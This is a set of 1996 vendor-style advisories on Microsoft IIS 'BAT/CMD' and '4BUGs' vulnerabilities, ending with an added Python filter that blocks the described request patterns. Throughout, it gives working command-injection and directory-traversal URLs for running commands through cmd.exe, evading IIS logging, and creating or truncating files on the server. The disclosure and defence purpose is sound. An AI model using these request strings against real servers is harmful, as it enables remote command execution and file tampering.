Microsoft Internet Information Server v 1.0 "BAT/CMD" Security Bug, Part I.

0. Abstract

The .bat and .cmd bug is well known in the Netscape server and is described in the WWW Security FAQ, Q59. The implementation of this bug (an undocumented remote administration feature) in the Microsoft IIS Web server beats all the top scores.

1. Default Configuration

Let's consider a fresh IIS Web server installation where all settings are default:

1) The CGI directory is /scripts.
2) There are no files abracadabra.bat or abracadabra.cmd in the /scripts directory.
3) The IIS Web server maps the .bat and .cmd extensions to cmd.exe. Therefore the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap has the following string:

   .bat or .cmd=C:\WINNT35\System32\cmd.exe /c %s %s

2. Attack

In this case a hacker with malicious intent can send either one of the two command lines to the server:

a) /scripts/abracadabra.bat?&dir+c:\+?&time
b) /scripts/abracadabra.cmd?&dir+c:\+?&time

and the following happens:

1) The browser asks how you want to save the document. Notepad.exe or any other viewer would do for this "type" of application.
2) The browser starts the download session. The download window appears on the screen.
3) The hacker clicks the "Cancel" button in the download window, because the "time" command on the server never terminates.
4) Nothing is logged on the server side by the IIS Web server, because the execution process was not successfully terminated!!! (Thanks to the "time" command.) The only way to see that something happened is to review all your NT security logs. But they do not contain information like REMOTE_IP. Thus the hacker's machine remains fully anonymous.

3. Resume

1) The IIS Web server allows a hacker to execute his "batch file" by typing

   /scripts/abracadabra.bat?&COMMAND1+?&COMMAND2+?&...+?&COMMANDN

   In a similar situation with the Netscape server, only a single command can be executed.
2) There is no file abracadabra.bat in the /scripts directory, but the .bat extension is mapped to C:\WINNT35\System32\cmd.exe. In a similar situation with the Netscape server, an actual .bat file must exist.
3) In case a hacker enters a command like "time" or "date" as COMMAND[N], nothing will be logged by the IIS Web server. In a similar situation with the Netscape server, the error log will have a record of the remote IP and the command you are trying to execute.

4. Workaround

Disable the .BAT and .CMD file extensions for external CGI scripts in the file mapping feature of the IIS Web server.

5. Reply from Microsoft

We sent the description of this bug to Microsoft. Here one can see their reply and acknowledgement.

NOTE: We have studied the Microsoft bug "fix" and found out that the problem has not been fixed! If one uses a slightly more complicated command string, an arbitrary command on the server can still be effectively executed. And again, nothing will be logged by IIS. More information is available here.

[NT and Net Security Services] 1996 © MWC Inc. -- Powered by OMNA Digital

Microsoft Internet Information Server v 1.0 "BAT/CMD" Security Bug, Part II.

0. Abstract

The .bat and .cmd bug for Microsoft Internet Information Server is described here. Microsoft claims to fix this problem. The patch is available from Microsoft's site.
We have studied this patch and found out that the problem has not been fixed! If one uses a slightly more complicated command string, an arbitrary command on the server can still be effectively executed. And again, nothing will be logged by IIS.

1. Default Configuration

We will consider the following settings:

1) An IIS Web server with the .bat/.cmd patch from Microsoft installed (or IIS downloaded after March 5, 1996).
2) The CGI directory is /scripts.
3) Consider test.bat in the /scripts directory:

   @echo off
   echo Content-type: text/plain
   echo.
   echo Hello World!

4) The IIS Web server maps the .bat and .cmd extensions to cmd.exe. Therefore the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap has the following string:

   .bat or .cmd=C:\WINNT35\System32\cmd.exe /c %s %s

2. Attack

In this case a hacker with malicious intent can send this command line to the server:

   /scripts/test.bat+%26dir+%26time+%26abracadabra.exe

with the results described in detail previously. The good news is that now the file test.bat must actually be present in the scripts directory.

3. Resume

As long as IIS does not log information about unsuccessful hits, there are ways for hackers to break into your entire NT box. I don't want to discuss this matter in more detail, but our network security partners recommend avoiding the use of IIS because of an even more severe "purple security bug," which they recently discovered in IIS.

4. Workaround

Disable the .BAT and .CMD file extensions for external CGI scripts in the file mapping feature of the IIS Web server, or don't use .bat or .cmd files as scripts.
Microsoft Internet Information Server vv. 1.x, 2.0b New Security Bugs Alert. June 30, 1996

0. Abstract

MWC, Inc. has discovered a new series of bugs ("4bugs") in MS IIS in addition to the "BAT/CMD" bug, Part I and Part II.

1. What these new bugs allow one to do.

The First bug allows a user to access any file on the same partition where your wwwroot directory exists (assuming that IIS_user has permission to read this file). It also allows execution of any executable file on the same partition where your scripts directory exists (assuming that IIS_user has permission to execute this file). If the cmd.exe file can be executed, then it also allows you to execute any command and read any file on any partition (assuming that IIS_user has permission to read or execute this file). This bug is similar to (but not the same as) the one discovered independently by James@superstation.net. For more information and the ISAPI filter DLL that fixes the problem, take a look at this page.

The Second and Third bugs exploit the passing of unchecked arguments to cmd.exe in a way similar to the "BAT/CMD" bug. These bugs allow you to create new or to modify existing files on any partition under the following conditions:

   BAT and (or) CMD files are mapped by IIS to the cmd.exe file
   IIS_USER has the right to create a file, in the case of new file creation
   IIS_USER has the right to delete a file, in the case of file modification

Unfortunately the Netscape Communications and Netscape Commerce servers have similar bugs. Similar things can be done with the Netscape Server if it uses BAT or CMD files as CGI scripts. We did not test all Web servers available on the market, but some of them are vulnerable too.

The Fourth bug is specific to the cmd.exe program. Once accessed (for example by exploiting the first bug), cmd.exe can be used to execute any internal command or any command on any partition, share, etc., or it can be used to create a new "custom made" file even if the mapping of the BAT and CMD files is disabled.

2. Alert

MWC, Inc. has sent a detailed bug report to Microsoft. The people at Microsoft we talked to are very concerned about their customers, and thus the fixes from Microsoft should be available soon. MWC, Inc. has sent the report to Netscape as well. MWC, Inc. will immediately send a copy of the report to every Web server developer company to let them test whether their Web server is vulnerable to the second and third bugs.

MWC, Inc. will publish the detailed report about the bugs on July 3, 1996 at 10:00 pm EST at this URL. We believe that the delay between this alert and the actual publication of the bug report will help Webmasters to reconfigure their websites before the information becomes available to the general public. MWC, Inc. will send the report about the bugs by e-mail to all registered users on July 3, 1996 at 10:00 pm EST. Register on-line to receive your copy of the report by e-mail.

3. Conclusions and Workaround

Regardless of the Web server you are using, create separate partitions for your wwwroot directories and scripts directories to be on the safe side. Disable the BAT/CMD files' mapping and never use BAT and (or) CMD files as CGI scripts.

Microsoft Internet Information Server vv. 1.x, 2.0b "4BUGs" Security Bugs REPORT. July 3, 1996

0. Abstract

MWC, Inc. has discovered a new series of bugs in MS IIS in addition to the "BAT/CMD" bug, Part I and Part II.

1. The 4 Bugs

"DOUBLE DOT" Bug allows an intruder to access any file on the same partition where your wwwroot directory is located (assuming that IIS_user has permission to read this file). It also allows an intruder to execute any executable file on the same partition where your scripts directory is located (assuming that IIS_user has permission to execute this file). If the cmd.exe file can be executed, then it also allows an intruder to execute any command and read any file on any partition (assuming that IIS_user has permission to read or execute this file).

The command

   http://[domain_name]/..\..\..\..\[PATH]\filename

allows an intruder to download any file on the same partition where the wwwroot directory is located. The commands

   http://[domain_name]/scripts/../../../../[PATH]/filename
or
   http://[domain_name]/scripts/..\..\..\..\[PATH]\filename

allow an intruder to execute any executable file on the same partition where your scripts are located.

Note: This bug is similar to (but not the same as) the one discovered independently by James@superstation.net. For more information and the ISAPI filter DLL that fixes the problem, take a look at this page.

"TRUNCATE" Bug allows an intruder to create new or to truncate existing files on any partition under the following conditions:

   BAT and (or) CMD files are mapped by IIS to the cmd.exe file
   IIS_USER has the right to create a file, in the case of new file creation
   IIS_USER has the right to delete a file, in the case of file modification

The command

   http://[domain_name]/scripts/abracadabra.bat>FULL_PATH\filename.bat

will create a new file at the FULL_PATH (drive:\directory) location if the file FULL_PATH\filename.bat does not exist. If the file exists and IIS_USER has permission to delete this file, the file will be truncated. The command

   http://[domain_name]/scripts/abracadabra.bat>FULL_PATH\filename%0A%0Dabracadabra.bat

will create a new file at the FULL_PATH (drive:\directory) location if the file FULL_PATH\filename does not exist. If the file exists and IIS_USER has permission to delete this file, the file will be truncated.

Note: The file abracadabra.bat does not need to exist in the scripts directory.

"REDIRECT" Bug will redirect output from any CGI script to a file under the following conditions:

   BAT and (or) CMD files are mapped to the cmd.exe file by IIS
   IIS_USER has the right to create a file, in the case of new file creation
   IIS_USER has the right to delete a file, in the case of file modification

The commands

   http://[domain_name]/scripts/script_nameFULL_PATH\filename%0A%0Dabracadabra.bat
or
   http://[domain_name]/scripts/script_name>FULL_PATH\filename%0A%0Dabracadabra.bat

will redirect (or append) output from the existing script_name to the filename file at the FULL_PATH (drive:\directory) location.

Note: The Netscape Communications and Netscape Commerce servers have similar bugs. Similar things can be done with the Netscape Server when using BAT/CMD files as CGI scripts. We did not test all Web servers available on the market, but some of them are vulnerable too. The commands

   http://[domain_name]/scripts/script.bat?>FULL_PATH\filename
or
   http://[domain_name]/scripts/script.bat?>>FULL_PATH\filename

will redirect (or append) output from the existing script to the filename file at the FULL_PATH (drive:\directory) location. The bug is probably more dangerous in this case because the Netscape Server runs by default under the local system account. An intruder can also use the "|" symbol under the Netscape server to transfer output from an existing BAT to every executable in any partition.

"CMD.EXE" Bug is specific to the cmd.exe shell program. Once accessed (for example by exploiting the Double Dot bug), cmd.exe can be used to execute any internal command or any command in any partition, and it can be used to create a new "custom made" file even if the mapping of the BAT/CMD files is disabled. The commands:

   http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command
or
   http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>FULL_PATH\filename
or
   http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>>FULL_PATH\filename

will execute any internal command and redirect or append the output from the command to a file. In particular, the command:

   http://[domain_name]/scripts/../../cmd.exe/?%2FC+echo+"hello,+World">c:\temp\hello.bat

will create a file c:\temp\hello.bat containing the phrase "hello, World". This allows a malicious user to create simple but dangerous files. For example, these files can be used as scripts for the ftp.exe command. This potentially allows anybody to cause the ftp client on the server to connect to the intruder's ftp server, download trojan horse programs, etc.

2. Alert

MWC, Inc. has sent a detailed bug report to Microsoft. The people at Microsoft we talked to are very concerned about their customers, and thus the patches from Microsoft should be available soon. MWC, Inc. has sent the report to Netscape as well. MWC, Inc. will immediately send a copy of the report to any Web server developer company to let them test whether their Web server is vulnerable to the bugs mentioned above.

3. Conclusions and Workaround

Regardless of the Web server you are using, create separate partitions for your wwwroot directories and scripts directories to be on the safe side. Disable the BAT/CMD files' mapping and never use BAT/CMD files as CGI scripts.

The real danger of the discovered bugs must not be underestimated. We demonstrated, by a Simulated Intrusion Attack on a test computer at the Windows NT Magazine lab, that a combination of the bugs can completely void the security of an NT domain. Information about the SIA test is scheduled for publication in one of the upcoming issues of WinNT Magazine.

4. The Patch

According to the reply from Microsoft, the patch for these bugs is now available at:

   http://www.microsoft.com/infoserv/iisservpack.htm
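The following Python request filter is an added example, not code from MWC, Microsoft or Netscape: it models the three checks a front-end filter (such as the ISAPI filter DLL the report points to) would apply to the request shapes described in Parts I and II and in the 4BUGs report, namely shell metacharacters bound for cmd.exe, ".." traversal with either separator, and any request for a .bat/.cmd script. The function names, reason strings and sample requests are constructed for the example; the samples reuse the advisories' own patterns and placeholders.

```python
import posixpath
from urllib.parse import unquote_plus

# Characters cmd.exe interprets once IIS hands a request to it through the
# ScriptMap entry ".bat or .cmd=cmd.exe /c %s %s": & chains commands, > and >>
# redirect output, CR/LF split lines, | pipes (the Netscape variant).
SHELL_METACHARS = frozenset('&|<>\r\n\x00')
BLOCKED_EXTENSIONS = frozenset({'.bat', '.cmd'})  # handlers the workaround unmaps


def fully_decode(text):
    """Percent-decode until stable so a double-encoded %2526 still becomes '&';
    '+' becomes a space, which is how IIS split the cmd.exe argument list."""
    previous = None
    while previous != text:
        previous, text = text, unquote_plus(text)
    return text


def check_request(request_uri):
    """Return (allowed, reason) for one request URI (path plus optional query).
    The path is always inspected. The query is inspected only when it carries
    no '=' because CGI then passes it on the command line (ISINDEX style),
    so ordinary a=1&b=2 queries keep working."""
    raw_path, _, raw_query = request_uri.partition('?')
    path = fully_decode(raw_path)
    argv_text = fully_decode(raw_query) if '=' not in raw_query else ''

    # BAT/CMD, TRUNCATE and REDIRECT all need a metacharacter to reach cmd.exe.
    if any(ch in SHELL_METACHARS for ch in path + argv_text):
        return False, 'shell metacharacter in request'

    # DOUBLE DOT: IIS accepted '\' as a separator, so normalise before looking
    # for '..'; the CMD.EXE bug relies on the same traversal to reach cmd.exe.
    segments = path.replace('\\', '/').split('/')
    if '..' in segments:
        return False, 'directory traversal'

    if any(posixpath.splitext(seg)[1].lower() in BLOCKED_EXTENSIONS
           for seg in segments):
        return False, 'bat/cmd script mapping disabled'

    return True, 'ok'


if __name__ == '__main__':
    # Constructed samples: advisory patterns with placeholders, plus two ordinary requests.
    for uri in ('/scripts/abracadabra.bat?&dir+c:\\+?&time',
                '/scripts/test.bat+%26dir+%26time+%26abracadabra.exe',
                '/..\\..\\..\\..\\[PATH]\\filename',
                '/scripts/../../cmd.exe/?%2FC+any_command',
                '/scripts/hello.pl?a=1&b=2', '/default.htm'):
        print(f'{uri!r:58} -> {check_request(uri)}')
```

A server that passes every query to cmd.exe regardless of '=' would need the metacharacter check applied to all queries, not only ISINDEX-style ones.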